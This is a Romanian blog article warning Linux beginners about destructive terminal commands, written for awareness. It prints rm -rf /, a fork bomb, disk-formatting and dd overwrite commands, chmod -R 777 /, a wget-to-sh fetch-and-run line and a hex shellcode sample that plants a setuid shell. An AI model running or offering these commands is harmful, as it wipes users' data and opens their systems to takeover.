3.8 C
București
miercuri, noiembrie 29, 2023

Comenzi Linux sinucigașe. Ferește-te de ele!

Ar trebui să le citești

Mare atenție

Dacă ești începător în ale Linuxului și dornic de a învăța cât mai multe despre acest sistem de operare, te-ai convins probabil că pe Internet sunt foarte multe informații, unele utile, altele mai puțin utile, chiar periculoase, când vine vorba mai ales de comenzi care se scriu în Terminal. Linux este într-adevăr un sistem de operare sigur și care oferă libertate totală utilizatorului, dar când acesta ia decizii în necunoștință de cauză, riscă să-și facă praf sistemul de operare sau chiar să-și șteargă tot HDD-ul calculatorului și toate mediile de stocare conectate în acel moment. Am putea spune și sperăm să nu supărăm pe nimeni că elementul cel mai vulnerabil în cazul unui sistem Linux se află chiar în fața monitorului.

…nu tot ce zboară se mănâncă

Terminalul este un instrument foarte puternic, care permite utilizatorului să comunice direct cu sistemul de operare prin intermediul comenzilor. De aceea, este bine ca înainte de a scrie o comandă în Terminal să ne documentăm un pic, să vedem ce face de fapt acea comandă. Se poate întâmpla să găsim pe Internet comenzi Linux care arată oarecum ciudat sau poate nu știm care este rolul lor. Nu le dați pur și simplu Copy/Paste în Terminal, mai ales dacă aveți date importante pe calculator sau dacă nu vă doriți neapărat să reinstalați sistemul de operare. Sunt șanse mari să se întâmple ceva rău, dar vina nu este a Linux-ului.

Comenzi sinucigașe

Iată mai jos o scurtă listă de comenzi pe care NU ar trebui să le scrii niciodată în Terminal, iar dacă totuși nu te poți abține, o faci pe riscul tău și nu poți trage pe nimeni la răspundere pentru eventualele pierderi suferite. Dacă le găsești pe Internet, ferește-te de ele!

rm -rf

Reprezintă cea mai rapidă modalitate de a șterge un folder și conținutul său. Cea mai periculoasă variantă a sa este rm -rf /, comandă care șterge tot ce se află în rădăcina sistemului de operare, cam tot ce ai ai pe calculator, inclusiv alte partiții de pe HDD sau alte medii de stocare externe, dacă acestea sunt conectate și montate în momentul execuției comenzii.

char esp[] attribute ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

ATENȚIE!

Este foarte util să ne ferim de lucrurile care arată ciudat, cu atât mai mult de comenzile Linux care arată precum cea de mai sus, adică foarte greu de descifrat. De fapt, ceea ce vezi mai sus este versiunea hexadecimală a comenzii rm -rf /, pe care Terminalul o va executa fără probleme!

:(){ :|: & };:

Această comandă arată destul de ciudat și face sistemul să se blocheze, cu riscul de a pierde datele din fișierele care nu sunt încă salvate. Denumirea acestei comenzi este “Fork Bomb” și provine de la ceea ce face de fapt: definește o funcție care se multiplică la infinit, preluând rapid toate resursele calculatorului și producând un blocaj.

mkfs.ext4 /dev/sda1

Această comandă creează un nou sistem de fișiere (formatează) pe prima partiție de pe HDD, probabil partiția pe care se află și sistemul de operare, ducând la pierderea tuturor fișierelor de pe acea partiție. Prima parte a comenzii arată tipul sistemului de fișiere nou creat, iar partea a doua arată partiția care se va formata. Astfel, comanda poate apărea în forme oarecum diferite, spre exemplu mkfs.ext3 /dev/sdb2 (creează un sistem de fișiere ext3 pe cea de-a doua partiție de pe al doilea mediu de stocare, care poate fi eventual un stick USB sau un HDD extern conectat în acel moment).

command > /dev/sda

O comandă pe cât de scurtă, pe atât de distructivă. Face ca rezultatul comenzii “command”, oricare ar fi ea, să se scrie direct pe HDD, avariind astfel sistemul de fișiere, cu mari șanse de a pierde date. Așadar, sunt de evitat comenzile care implică denumiri de hard-disk, precum /dev/sd.

dd if=/dev/random of=/dev/sda

Nici ea nu face altceva decât să scrie date la întâmplare pe HDD, corupându-l.

mv ~ /dev/null

Este și ea destul de eficientă, te scapă rapid de conținutul din Home, mutându-l într-o locație inexistentă. Simbolul “~” reprezintă directorul Home, iar comanda “mv” mută fișierele dintr-un loc în altul, însă noua locație, în cazul nostru “/dev/null”, face ca fișierele să se piardă.

wget http://example.com/something -O – | sh

Este periculoasă deoarece “wget” descarcă un conținut (eventual un script) de pe internet și apoi îl rulează fără să știm care este de fapt conținutul descărcat. Poate fi un malware, care în acest fel pătrunde în sistem, iar utilizatorul își dă acordul când rulează acea comandă.

chmod -R 777 /

Prin această comandă se oferă permisiuni complete (citire, scriere și execuție) tuturor utilizatorilor pentru directorul / (și tot ce conține el). Astfel, siguranța și stabilitatea sistemului de operare sunt compromise.

REAMINTIM CĂ NU NE ASUMĂM RĂSPUNDEREA PENTRU EVENTUALELE PAGUBE SUFERITE ÎN URMA EXECUTĂRII COMENZILOR DE MAI SUS. RECOMANDĂM SĂ NU LE ÎNCERCAȚI, ACEST ARTICOL ESTE SCRIS CU SCOPUL DE A VĂ PUNE ÎN TEMĂ. DOAR CUNOSCÂND PERICOLELE NE PUTEM APĂRA.

- Advertisement -

Articole asemănătoare

Ce lecții am învățat în acești ani de pentruprieteni.com

Lecții Lecțiile învățate în toți acești ani de pentruprieteni.com au fost interesante și numeroase. Nimeni nu ne-a pregătit pentru ceea ce urma să vină, pentru...
- Advertisement -

Cele mai noi articole